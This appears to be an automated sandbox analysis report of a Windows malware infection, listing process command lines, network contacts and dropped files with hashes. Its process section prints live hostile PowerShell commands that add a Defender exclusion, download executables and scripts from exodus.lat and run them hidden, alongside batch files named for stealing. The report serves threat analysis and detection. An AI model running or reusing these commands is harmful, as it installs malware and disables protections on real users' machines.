
C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1048.6.851267058\491853832" -childID 5 -isForBrowser -prefsHandle 3992 -prefMapHandle 3996 -prefsLen 26275 -prefMapSize 233444 -jsInitHandle 588 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {0cd22b16-c5ab-462b-b8a8-0a3af2845bab} 1048 "\\.\pipe\gecko-crash-server-pipe.1048" 3980 1f821758 tab

C:\Users\Admin\AppData\Local\Temp\491505\RegAsm.exe

C:\Users\Admin\AppData\Local\Temp\491505\RegAsm.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\download.bat" "

C:\Windows\SysWOW64\net.exe

net session

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 session

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\asm'"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden -Command "& { (New-Object Net.WebClient).DownloadFile('https://exodus.lat/COMSurrogate.exe', 'C:\Users\Admin\AppData\Local\asm\COMSurrogate.exe') }"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\runsteal.bat" "

C:\Users\Admin\AppData\Local\Temp\smartscreen.exe

"C:\Users\Admin\AppData\Local\Temp\smartscreen.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\checkmiexe.bat" "

C:\Windows\SysWOW64\net.exe

net session

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Invoke-WebRequest -Uri 'https://exodus.lat/ss.bat' -OutFile 'C:\Users\Admin\AppData\Local\Temp\downloaded_script.bat' -UseBasicParsing"

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 session

C:\Windows\SysWOW64\tasklist.exe

tasklist /fi "imagename eq mi.exe"

C:\Windows\SysWOW64\find.exe

find /i "mi.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\asm'"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden -Command "Start-Process -FilePath 'C:\Users\Admin\AppData\Local\asm\COMSurrogate.exe' -WindowStyle Hidden"

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\downloaded_script.bat"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden -Command "& { (New-Object Net.WebClient).DownloadFile('https://exodus.lat/COMSurrogate.exe', 'C:\Users\Admin\AppData\Local\asm\COMSurrogate.exe') }"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden -Command "Start-Process -FilePath 'C:\Users\Admin\AppData\Local\asm\COMSurrogate.exe' -WindowStyle Hidden"

Network

Country Destination Domain Proto
RU 185.215.113.43:80 185.215.113.43 tcp
RU 31.41.244.11:80 31.41.244.11 tcp
US 8.8.8.8:53 UWPunrsopYzTstryocRtyY.UWPunrsopYzTstryocRtyY udp
RU 185.215.113.16:80 185.215.113.16 tcp
US 8.8.8.8:53 atten-supporse.biz udp
US 172.67.165.166:443 atten-supporse.biz tcp
NL 92.63.197.221:80 92.63.197.221 tcp
US 8.8.8.8:53 se-blurry.biz udp
US 104.21.81.153:443 se-blurry.biz tcp
US 8.8.8.8:53 zinc-sneark.biz udp
US 104.21.62.142:443 zinc-sneark.biz tcp
US 8.8.8.8:53 dwell-exclaim.biz udp
US 104.21.88.210:443 dwell-exclaim.biz tcp
US 8.8.8.8:53 formy-spill.biz udp
US 172.67.173.74:443 formy-spill.biz tcp
RU 185.215.113.206:80 185.215.113.206 tcp
US 8.8.8.8:53 covery-mover.biz udp
US 104.21.58.186:443 covery-mover.biz tcp
US 8.8.8.8:53 dare-curbys.biz udp
US 172.67.181.44:443 dare-curbys.biz tcp
US 8.8.8.8:53 print-vexer.biz udp
US 172.67.181.192:443 print-vexer.biz tcp
US 8.8.8.8:53 impend-differ.biz udp
US 8.8.8.8:53 steamcommunity.com udp
GB 23.214.143.155:443 steamcommunity.com tcp
US 8.8.8.8:53 marshal-zhukov.com udp
US 104.21.82.174:443 marshal-zhukov.com tcp
N/A 127.0.0.1:49849 tcp
N/A 127.0.0.1:49865 tcp
US 8.8.8.8:53 youtube.com udp
US 8.8.8.8:53 getpocket.cdn.mozilla.net udp
US 8.8.8.8:53 spocs.getpocket.com udp
GB 216.58.213.14:443 youtube.com tcp
US 8.8.8.8:53 youtube.com udp
US 34.120.5.221:443 getpocket.cdn.mozilla.net tcp
US 8.8.8.8:53 prod.pocket.prod.cloudops.mozgcp.net udp
US 8.8.8.8:53 prod.pocket.prod.cloudops.mozgcp.net udp
US 8.8.8.8:53 youtube.com udp
US 8.8.8.8:53 prod.ads.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 prod.content-signature-chains.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 shavar.prod.mozaws.net udp
US 8.8.8.8:53 prod.ads.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 shavar.prod.mozaws.net udp
US 8.8.8.8:53 prod.content-signature-chains.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 prod.remote-settings.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 prod.remote-settings.prod.webservices.mozgcp.net udp
GB 216.58.213.14:443 youtube.com udp
US 8.8.8.8:53 www.youtube.com udp
GB 142.250.200.14:443 www.youtube.com tcp
US 8.8.8.8:53 youtube-ui.l.google.com udp
US 8.8.8.8:53 youtube-ui.l.google.com udp
US 8.8.8.8:53 firefox-settings-attachments.cdn.mozilla.net udp
GB 142.250.200.14:443 youtube-ui.l.google.com udp
US 34.117.121.53:443 firefox-settings-attachments.cdn.mozilla.net tcp
US 8.8.8.8:53 consent.youtube.com udp
US 8.8.8.8:53 attachments.prod.remote-settings.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 consent.youtube.com udp
US 8.8.8.8:53 attachments.prod.remote-settings.prod.webservices.mozgcp.net udp
GB 142.250.200.14:443 consent.youtube.com tcp
US 8.8.8.8:53 consent.youtube.com udp
GB 142.250.200.14:443 consent.youtube.com udp
US 8.8.8.8:53 www.google.com udp
GB 142.250.187.196:443 www.google.com tcp
US 8.8.8.8:53 www.google.com udp
US 8.8.8.8:53 www.google.com udp
GB 142.250.187.196:443 www.google.com udp
US 8.8.8.8:53 consent.youtube.com udp
US 8.8.8.8:53 consent.youtube.com udp
GB 45.74.38.211:4782 tcp
US 8.8.8.8:53 exodus.lat udp
NL 203.161.45.11:443 exodus.lat tcp
NL 203.161.45.11:443 exodus.lat tcp
NL 203.161.45.11:443 exodus.lat tcp
NL 203.161.45.11:443 exodus.lat tcp
US 8.8.8.8:53 play.google.com udp
US 8.8.8.8:53 play.google.com udp
GB 142.250.179.238:443 play.google.com tcp
US 8.8.8.8:53 play.google.com udp
GB 142.250.179.238:443 play.google.com udp
US 8.8.8.8:53 prod.balrog.prod.cloudops.mozgcp.net udp
US 8.8.8.8:53 prod.balrog.prod.cloudops.mozgcp.net udp
US 8.8.8.8:53 prod.remote-settings.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 ciscobinary.openh264.org udp
GB 88.221.134.209:80 ciscobinary.openh264.org tcp
US 8.8.8.8:53 a19.dscg10.akamai.net udp
US 8.8.8.8:53 a19.dscg10.akamai.net udp
US 8.8.8.8:53 redirector.gvt1.com udp
GB 142.250.187.206:443 redirector.gvt1.com tcp
US 8.8.8.8:53 redirector.gvt1.com udp
US 8.8.8.8:53 redirector.gvt1.com udp
GB 142.250.187.206:443 redirector.gvt1.com udp
US 8.8.8.8:53 r4---sn-aigzrnsz.gvt1.com udp
US 8.8.8.8:53 r4.sn-aigzrnsz.gvt1.com udp
GB 74.125.175.169:443 r4.sn-aigzrnsz.gvt1.com tcp
US 8.8.8.8:53 r4.sn-aigzrnsz.gvt1.com udp
GB 74.125.175.169:443 r4.sn-aigzrnsz.gvt1.com udp
RU 188.119.66.185:443 188.119.66.185 tcp
NL 31.214.157.206:2024 tcp

Files

memory/1520-0-0x0000000001280000-0x0000000001745000-memory.dmp

memory/1520-1-0x00000000777A0000-0x00000000777A2000-memory.dmp

memory/1520-2-0x0000000001281000-0x00000000012AF000-memory.dmp

memory/1520-3-0x0000000001280000-0x0000000001745000-memory.dmp

memory/1520-4-0x0000000001280000-0x0000000001745000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe

MD5 cd86e4c2fbaf81cb17606d69108fff47
SHA1 97117dadf1a95214ceaf1d1d9337dae317c6a358
SHA256 458d36f8118c122fcd17e2ea1859282fd29e5f774ab7998787150c4f21ed360e
SHA512 42393ee97337b197a176032276b9da8bd3ba26d5e5a36751130271422a9cb0a91d50a22c9f75e4de77083b47d8b6c7f54c5f1ebccd09f97dbba8eb6591554748

memory/1520-18-0x0000000001280000-0x0000000001745000-memory.dmp

memory/2876-19-0x0000000000250000-0x0000000000715000-memory.dmp

memory/2876-20-0x0000000000251000-0x000000000027F000-memory.dmp

memory/2876-21-0x0000000000250000-0x0000000000715000-memory.dmp

memory/2876-24-0x0000000000250000-0x0000000000715000-memory.dmp

memory/2876-23-0x0000000000250000-0x0000000000715000-memory.dmp

memory/2876-25-0x0000000000250000-0x0000000000715000-memory.dmp

memory/1520-26-0x00000000072F0000-0x00000000077B5000-memory.dmp

memory/2876-27-0x0000000000250000-0x0000000000715000-memory.dmp

memory/2876-28-0x0000000000250000-0x0000000000715000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1012382001\i1A5m12.exe

MD5 3a16d0e4e4522073da3c8a5a9f9e790b
SHA1 7a42a21a348d2e49c67b426d333a5c354ed2c83e
SHA256 ccc4dd64df98c26da462a17a8df9f927d02e202d88ada8cfba92b7bbeb954c3e
SHA512 1213c3e077b660afa65133f0b5943bd866f02d736284791dc99ae4d30c6ed7705eb55999cb4a3be1cc0a394111904154bc72a2d0f1fdc453893ecf9a4a25b99a

memory/3020-42-0x0000000000400000-0x0000000000414000-memory.dmp

\Users\Admin\AppData\Local\Temp\is-9K4OL.tmp\i1A5m12.tmp

MD5 e672d5907f1ce471d9784df64d8a306b
SHA1 6d094cae150d72b587c5480c15127d7059e16932
SHA256 9f9250be71bd6254790a9630990f4560d53995db3d8737b7f49986e3551283e5
SHA512 9cf10e997d8d99e6eb2f6ccac00ab365f63e03d96c2e2354fdf67683b85553a60cd9542cfb21cbea468c6a2bda454cde71937c0d21c4b738451b5e2c30690c39

\Users\Admin\AppData\Local\Temp\is-5D0VK.tmp\_isetup\_shfoldr.dll

MD5 92dc6ef532fbb4a5c3201469a5b5eb63
SHA1 3e89ff837147c16b4e41c30d6c796374e0b8e62c
SHA256 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87
SHA512 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3

\Users\Admin\AppData\Local\Temp\is-5D0VK.tmp\_isetup\_iscrypt.dll

MD5 a69559718ab506675e907fe49deb71e9
SHA1 bc8f404ffdb1960b50c12ff9413c893b56f2e36f
SHA256 2f6294f9aa09f59a574b5dcd33be54e16b39377984f3d5658cda44950fa0f8fc
SHA512 e52e0aa7fe3f79e36330c455d944653d449ba05b2f9abee0914a0910c3452cfa679a40441f9ac696b3ccf9445cbb85095747e86153402fc362bb30ac08249a63

\Users\Admin\AppData\Local\RAF Encoder 1.0.1.55\rafencoder.exe

MD5 b466bf1dc60388a22cb73be01ca6bf57
SHA1 21eb9665e42d6c4a8d9e764627049b2a6e3a69a4
SHA256 e5f0f0c3383080fc2702779e3040c490ab022af69a4bc8c61bf9b1f6514ae7ad
SHA512 6cb51dae17b3bcef6254ecf6538ecc49cdd53c40c979fd743f49987b28d05c033781b1047dbf25b203b02bf70ce4205dcc1cc5bbea46119cb0e2cd0ce140cbe2

memory/2460-85-0x0000000004010000-0x00000000042EF000-memory.dmp

memory/1260-88-0x0000000000400000-0x00000000006DF000-memory.dmp

C:\Users\Admin\AppData\Local\RAF Encoder 1.0.1.55\sqlite3.dll

MD5 e477a96c8f2b18d6b5c27bde49c990bf
SHA1 e980c9bf41330d1e5bd04556db4646a0210f7409
SHA256 16574f51785b0e2fc29c2c61477eb47bb39f714829999511dc8952b43ab17660
SHA512 335a86268e7c0e568b1c30981ec644e6cd332e66f96d2551b58a82515316693c1859d87b4f4b7310cf1ac386cee671580fdd999c3bcb23acf2c2282c01c8798c

memory/1260-90-0x0000000000400000-0x00000000006DF000-memory.dmp

memory/2876-94-0x0000000000250000-0x0000000000715000-memory.dmp

memory/2460-95-0x0000000004010000-0x00000000042EF000-memory.dmp

memory/3020-96-0x0000000000400000-0x0000000000414000-memory.dmp

memory/2460-97-0x0000000000400000-0x00000000004BC000-memory.dmp

memory/1260-100-0x0000000000400000-0x00000000006DF000-memory.dmp

memory/1260-99-0x0000000060900000-0x0000000060992000-memory.dmp

memory/1260-98-0x0000000000400000-0x00000000006DF000-memory.dmp

memory/2876-101-0x0000000000250000-0x0000000000715000-memory.dmp

memory/1260-104-0x0000000000400000-0x00000000006DF000-memory.dmp

memory/2876-106-0x0000000000250000-0x0000000000715000-memory.dmp

memory/1260-109-0x0000000000400000-0x00000000006DF000-memory.dmp

memory/2876-111-0x0000000000250000-0x0000000000715000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1012475001\wL3EGdM.exe

MD5 a67e34baacfca98f323981d3b0087f3b
SHA1 d22ccae2971df83812acaebc750d9a2c87357fe5
SHA256 6092579a997945b10d3f279693baa004d180417ccfec941c45eb20705a2b4706
SHA512 39c7a33ab14e518a09f4e022c1c61c8b5a88417af3ce5a1769ab8c0fa328a178fcd79a098c4c7f3344df75e2b7cd22ebf6a88d43ad61599c53a3c89d54c29d6d

C:\Users\Admin\AppData\Local\Temp\Audit

MD5 9da23439e34b0498b82ae193c5a8f3a8
SHA1 ae20bbe7fac03c94e42f4dd206d89003faae7899
SHA256 0f241cc0324871a1a900a7ac0edf889a8d12875b1072f44856cc979a4b7a77ac
SHA512 cd4b262753b4f5f1dac09c20fa64ebdee00cf4a3fce92287a7439df943ea65bdf8569f541c2668b2164139b91facccfb3c98db8ad8f686637f4e317583cc98a2

C:\Users\Admin\AppData\Local\Temp\Commissioner

MD5 6ee7ddebff0a2b78c7ac30f6e00d1d11
SHA1 f2f57024c7cc3f9ff5f999ee20c4f5c38bfc20a2
SHA256 865347471135bb5459ad0e647e75a14ad91424b6f13a5c05d9ecd9183a8a1cf4
SHA512 57d56de2bb882f491e633972003d7c6562ef2758c3731b913ff4d15379ada575062f4de2a48ca6d6d9241852a5b8a007f52792753fd8d8fee85b9a218714efd0

C:\Users\Admin\AppData\Local\Temp\Dentists

MD5 895c5374a042a9e6c78c673690cd2275
SHA1 9dfe1b532f958f678de2bac7c74646e007a8fa14
SHA256 226099aac21e8d4a671a68b37d204339703fb696b6cc5aa30311fb55d6ab2147
SHA512 130af34bb1d12db8e86b930d8e490754687e1381a0104ac4c98cc2f02ff7fc4ed9e1d549121a013e1c32663a00d1dc8eb20d2f9831feb3c7eb17bf61a1d8d52c

C:\Users\Admin\AppData\Local\Temp\Revenue

MD5 aabc90b85b9c3b51543de0339d29778e
SHA1 299f5e2ca9326e0a5feefb4fc7b05da93cfd11a1
SHA256 9a0a3567f4c9b9ca46fbf41d65cdd5ce464b0efe42d6aaf7cff840addbe05d60
SHA512 3d951489d7d46874909bfd82e9cac346bdd15bbb485fc76e1ed7d6fe7bb51a7649d1f649b75bb6f6f1b6f10ea16113cd01c20aa7ea85d038fcb7fe317082edf3

C:\Users\Admin\AppData\Local\Temp\Soundtrack

MD5 b75737c804ca9949cc63bd42c945a5e6
SHA1 75c0490174adc40d1824b1024021b82dd5c762b7
SHA256 628068ee856d68776d6e9b755cd42d7a5a46af1a2a6a2c22e65db95b5d2d8f2c
SHA512 58fedd2bd6318d4b93de429d184701e059321c16872cafc978837c29985404bf432e4a2701894f7f67045f9684da40c8e14f9f557da3398c5d6eeca2e18faca7

C:\Users\Admin\AppData\Local\Temp\Zip

MD5 84f05dddefb1c72567827be553fe67fe
SHA1 c2ebcc4de3439a8206aa8faac90312bfb207ce4f
SHA256 b7de8d92196f323eb9a6237b9e902461569fd093b36e1988dee9de2ab157bb12
SHA512 99954fa07fe7cc0e54dbd0af09b32507cd998c8b44cb63f1ffe8e30667b6d1bb0949a6c95b60e40e73f0b0bb3f11e79f8fa23f696032118210cd10f03eec2904

C:\Users\Admin\AppData\Local\Temp\Proceeds

MD5 de061b898e12d89c92409f220918347f
SHA1 6b571edab30dcc4d5518e5bebb296d1f7bf5414c
SHA256 70fda66f3ea2607d6cff63d0a6a7258577690d2a9bc5105bb529889ce025d1c2
SHA512 61d94f04572643dc4274aedda51e7cb6bcccefcfa4556e6d87f94195ddf90ffbeb65909688c7bc3407f244021cc6dff0c8692fd7835ee61e6a43a0394a693a2b

C:\Users\Admin\AppData\Local\Temp\Justice

MD5 774df02c553d130dde3aa7496b64ebed
SHA1 e2a4aab8c3b654bd022662045fa70413a80e55f9
SHA256 ae9283c1a14b751639a75592295d85105954b761737ab77fc1e667a1498f2e9e
SHA512 c132cdf383e4fa32362d50768898ed9c6cd1e306056d066168a8ac1ee3ea7953424ff3b241ff1e0376b99b91f566b698bfef07da9bc45471097a6637dc154d11

C:\Users\Admin\AppData\Local\Temp\Artistic

MD5 d35007cc8b2860b1fe9ee861e1f2846d
SHA1 58638fd185601506b3b13fe254065aeb7edff28c
SHA256 de1e4dbe18f0b926b49aceb10157bc7f542409bad6242422efef3b831608a037
SHA512 45f851201656cb19c89274d124a7625a4c9fe12f412616a84458aa1857c61455126264416ff7fa1c9ffa99b994613baecfacd1f8179240a5021c7e5b867ea068

C:\Users\Admin\AppData\Local\Temp\Disturbed

MD5 0e2df9a4f4d78ad0299f0377d417b39e
SHA1 a2452ab3b04b480dfc2a58a416762e280254751f
SHA256 8834f63f09734b9f284437f26cba4909ce9ae1aceafa27e2bcd7531c1a7479df
SHA512 d8194f24cc02fc030c7cf1dab5970257a79b8bcc887a8ff1ccd104e94ea809dcd266b056c80e6a0e73cba71f81e654389025c939e3135f6fafca9d51737812b8

C:\Users\Admin\AppData\Local\Temp\Flavor

MD5 d9182f7a263f19b9876e7e1568e6c760
SHA1 d0683b5a7247a2f4a69473165d2c2649f2e1c01f
SHA256 4efff79e94f136f9bbaed62501810937785831b8c10ee9eb675ceae24cf3c4c9
SHA512 85582b94da822580eb26bc477440d87fb0a9ed98e3b75166cd96c2a18c88367c8bdd808fc43c52c2078e625efd81983e9f2e733272289833700649ad58a96a9b

C:\Users\Admin\AppData\Local\Temp\491505\B

MD5 0a1e63fc10dd1dbb8b2db81e2388bf99
SHA1 67ad39aabbf4875bc1b165ccd5afc40194d1d3c8
SHA256 122991768f589431b9166a4e22523bf48a53efff73fc2b191955e604196541b7
SHA512 94c50f06e1d157381b9d0746044b5d015e2946b44291d92739783cb3ed9e91371cf7d1b981d3108d910d7a7000810fe69fbe6590f9a84f822b671866ab9db5fc

memory/1260-490-0x0000000000400000-0x00000000006DF000-memory.dmp

memory/2876-492-0x0000000000250000-0x0000000000715000-memory.dmp

memory/1260-495-0x0000000000400000-0x00000000006DF000-memory.dmp

memory/2876-504-0x0000000000250000-0x0000000000715000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1012579001\d3b8f2d358.exe

MD5 623d073b8d01e00cbb5294ff07fe238a
SHA1 c3aeeb4de6cd38209944e7a1c3ecaa3f411f8775
SHA256 ce50862f51244b9dce6dbde2bc96fa852cff8ca84b720797894a3f43f4e293ca
SHA512 dc1fe9e39173bfd1e2722125b1385cf8c15e2570b65c1d5acb320a70d073d39a1a25f3665a87ccb3b8a0aaf7b7e63edb21e8e3cd4c3ac27e9cda237b54979824

memory/2876-520-0x0000000006C70000-0x00000000074D2000-memory.dmp

memory/576-523-0x0000000000400000-0x0000000000C62000-memory.dmp

memory/2876-522-0x0000000006C70000-0x00000000074D2000-memory.dmp

memory/1260-526-0x0000000000400000-0x00000000006DF000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1012580001\d902cee6ea.exe

MD5 d124690a731b9f9511d39dda3a5ef3d8
SHA1 26fc68f194903e93db04711c9524c442845b583c
SHA256 47cb2f5b689678b3292f548d7346c6b400dedc6a2b1dde54b2e343b8b5fc2775
SHA512 e936a771891f85dca11f607acaae7780e9b11eb7ae7afcbc6273ce2386f1d9739c2db55b45c5a8fb4de2af84636e7610cfba096d0a26ab7c31d25176dcf22634

memory/1260-536-0x0000000002B00000-0x0000000002BA1000-memory.dmp

memory/2372-544-0x00000000009C0000-0x0000000000E4C000-memory.dmp

memory/2876-543-0x0000000006520000-0x00000000069AC000-memory.dmp

memory/2876-548-0x0000000000250000-0x0000000000715000-memory.dmp

memory/2876-549-0x0000000006C70000-0x00000000074D2000-memory.dmp

memory/2876-550-0x0000000006C70000-0x00000000074D2000-memory.dmp

memory/576-551-0x0000000000400000-0x0000000000C62000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1012581001\7329de9159.exe

MD5 343a771efad9c921a3abb8d4201f6040
SHA1 b142b17a0dfb82b75071950eba743d0150ad12ff
SHA256 6d08fa0a96bed6936121d80a60807e6682f0e1ce65f4fca2006fffcf109aa85e
SHA512 d0ebd4de115ae62ea6d7aee7e636f767fe8823b09a0beb22bf64805ea4f01034b7b89092fe0083d9bc694fea3fe2d457aeadff49b4a17c81bc099861620c91e2

memory/2876-569-0x0000000006C70000-0x000000000716F000-memory.dmp

memory/576-568-0x0000000000400000-0x0000000000C62000-memory.dmp

memory/2876-570-0x0000000006C70000-0x000000000716F000-memory.dmp

memory/1864-571-0x00000000002F0000-0x00000000007EF000-memory.dmp

memory/1260-574-0x0000000000400000-0x00000000006DF000-memory.dmp

memory/1864-577-0x00000000002F0000-0x00000000007EF000-memory.dmp

memory/2372-579-0x00000000009C0000-0x0000000000E4C000-memory.dmp

memory/2876-578-0x0000000006520000-0x00000000069AC000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1012582001\a01c94d9d9.exe

MD5 8746d7ddcd593e7a9a38016b27a6dde0
SHA1 a505737a7bebefbd81d28d729e26187d15ea3aa7
SHA256 159e04da0b72590135477fa37369439acc2dd400ba28af7597ab05f0be906280
SHA512 9d2c4372c85f2f176f5034c4eb54ba1290260b69cd760fb17e7f3a54ecb490290fa033716f2019231c50b321d314e36b5d6003253e176be8d250cbe689e45b52

memory/2372-594-0x00000000009C0000-0x0000000000E4C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Cab191E.tmp

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

C:\Users\Admin\AppData\Local\Temp\Tar1931.tmp

MD5 4ea6026cf93ec6338144661bf1202cd1
SHA1 a1dec9044f750ad887935a01430bf49322fbdcb7
SHA256 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA512 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

memory/2876-611-0x0000000000250000-0x0000000000715000-memory.dmp

memory/2372-631-0x00000000009C0000-0x0000000000E4C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1012583001\8785c75487.exe

MD5 fc6804a55358a117689dab9333fd0ee5
SHA1 bbe4309bc6d99a67ecc0e866907889659d8e7031
SHA256 4decdc379789942364429bbbed02dda060d79e613ed657ca541fd5f37873fd58
SHA512 6a7b08a022cb25bfa0f906ba50a322bf3a7333e28d083d73c848d220789530f6ad31a65c0b7baf062c3cb5be30128a9af0d3fb43ea714f72f7b1b7bcf622271c

memory/2876-650-0x0000000006520000-0x00000000067C8000-memory.dmp

memory/2876-652-0x0000000006C70000-0x000000000716F000-memory.dmp

memory/2192-654-0x0000000000980000-0x0000000000C28000-memory.dmp

memory/2876-653-0x0000000006C70000-0x000000000716F000-memory.dmp

memory/2192-662-0x0000000000980000-0x0000000000C28000-memory.dmp

memory/2192-661-0x0000000000980000-0x0000000000C28000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n3lsnn48.default-release\datareporting\glean\db\data.safe.bin

MD5 d93cf7836e5d1d3474636cf8cc38a164
SHA1 29b6f80e7e29330c733e4e1a1a2e1ab446d22604
SHA256 e02e2ebd95f5933fd05ffa097afd2a1295ab146bd2d29a60ed95c80e45f082f9
SHA512 09322bba04b2ced732962d6ffb4a9fcc4b1230a242aee190098ae25ff27cbb50619ec94e217a9160fd3c5f32a1c013abab8f9635ae6c198037daa5043427c1a0

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n3lsnn48.default-release\datareporting\glean\pending_pings\9d1ce41d-8024-40b6-bcc1-9682a0d7fad8

MD5 76c81c7992bcdbbb53aed0457520d2c8
SHA1 22324aa9f152ca5bf4fff7a90c4dc5ed4795a2a7
SHA256 99d25738a33c9f065cf6e91c04e641fd8f7781d87fd37527890fef2f09bf7c9d
SHA512 703438f1851a619fa62969aaf66bdc710c3e1a4cc8724674c1d79ab5980ac6bd03c8bdb82b9b9552890264c0aaef602abd3d83f4994c93e13ad641f18c745751

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\n3lsnn48.default-release\activity-stream.discovery_stream.json.tmp

MD5 62b7b9a10e6b0e0af45f4a013d683a19
SHA1 e74b589ed9c75d9226dbd044c9b13b8896051609
SHA256 46030a1621dddbd11a043faf4b0756b6b883ded559643cc6c368d3ac4de37059
SHA512 78f9f3ac5c389df8bbe746c1bd2b0a123c89d8c502e5bfa1dc632a78ca9b2c379162baa3d8f824775c792961942a5489ba5527b6d84f126302a9fa5ac2f8f634

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\n3lsnn48.default-release\settings\main\ms-language-packs\browser\newtab\asrouter.ftl

MD5 96c542dec016d9ec1ecc4dddfcbaac66
SHA1 6199f7648bb744efa58acf7b96fee85d938389e4
SHA256 7f32769d6bb4e875f58ceb9e2fbfdc9bd6b82397eca7a4c5230b0786e68f1798
SHA512 cda2f159c3565bc636e0523c893b293109de2717142871b1ec78f335c12bad96fc3f62bcf56a1a88abdeed2ac3f3e5e9a008b45e24d713e13c23103acc15e658

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n3lsnn48.default-release\prefs.js

MD5 37c6e92023697f4482b6678dc06ad062
SHA1 516cdbe42ecf0ddba61659662ee8980592deabdd
SHA256 c439181d998c9b96b2cd8adb25260f376c27f89c999f7e85025c72ce56662df6
SHA512 d4085f92f0876f194509c59159da94f9f79bd418efba05003a92e0d48c4f018d2924f63547b804cb7fb9869784e5a23c0d10cf6799142aa6c559b5e21bc8dfe5

memory/576-757-0x0000000000400000-0x0000000000C62000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n3lsnn48.default-release\prefs-1.js

MD5 1abfefc8475a3e985e5e83b76d874a43
SHA1 e86544cdb27225bbf05cdde4c2fd21e709ecc13b
SHA256 a85ccad806ad05f7cd7f791586c6237a89b45e45f615837c2687e09ffeb60c0f
SHA512 de2cb2658a6035c39d431c7871acc6a31289762623f8784b9395b6700714d1dac4618013bfe0976de33c150f94ce24f6603429fb4d1463a00c2126013f26673e

memory/1260-804-0x0000000000400000-0x00000000006DF000-memory.dmp

\Users\Admin\AppData\Local\Temp\491505\RegAsm.exe

MD5 b58b926c3574d28d5b7fdd2ca3ec30d5
SHA1 d260c4ffd603a9cfc057fcb83d678b1cecdf86f9
SHA256 6e70b56d748c4ccab13cc8a055d3795ea0dd95fe3b70568d7d3ac0c6621140a3
SHA512 b13cb998822b716b695013bcd6dec62a2290567d0d1743b2d982ca084235cf69c6ea1fc91c9d4e62657c6f9e102c7c60e81296ab055ffe43b887c5f8ec8958ab

memory/2876-832-0x0000000000250000-0x0000000000715000-memory.dmp

memory/2876-833-0x0000000006520000-0x00000000067C8000-memory.dmp

memory/2192-835-0x0000000000980000-0x0000000000C28000-memory.dmp

memory/3628-836-0x00000000003D0000-0x00000000007D4000-memory.dmp

memory/3628-838-0x00000000003D0000-0x00000000007D4000-memory.dmp

memory/3628-839-0x00000000003D0000-0x00000000007D4000-memory.dmp

memory/3628-842-0x00000000002B0000-0x00000000002BE000-memory.dmp

memory/3628-843-0x0000000000890000-0x00000000008EC000-memory.dmp

memory/3628-850-0x0000000000B50000-0x0000000000B62000-memory.dmp

memory/3628-851-0x0000000000BB0000-0x0000000000BB8000-memory.dmp

memory/3628-853-0x0000000000BE0000-0x0000000000BE8000-memory.dmp

memory/3628-852-0x0000000000BD0000-0x0000000000BD8000-memory.dmp

memory/3628-854-0x0000000000BF0000-0x0000000000C08000-memory.dmp

memory/2192-856-0x0000000000980000-0x0000000000C28000-memory.dmp

memory/3628-857-0x0000000000C80000-0x0000000000C90000-memory.dmp

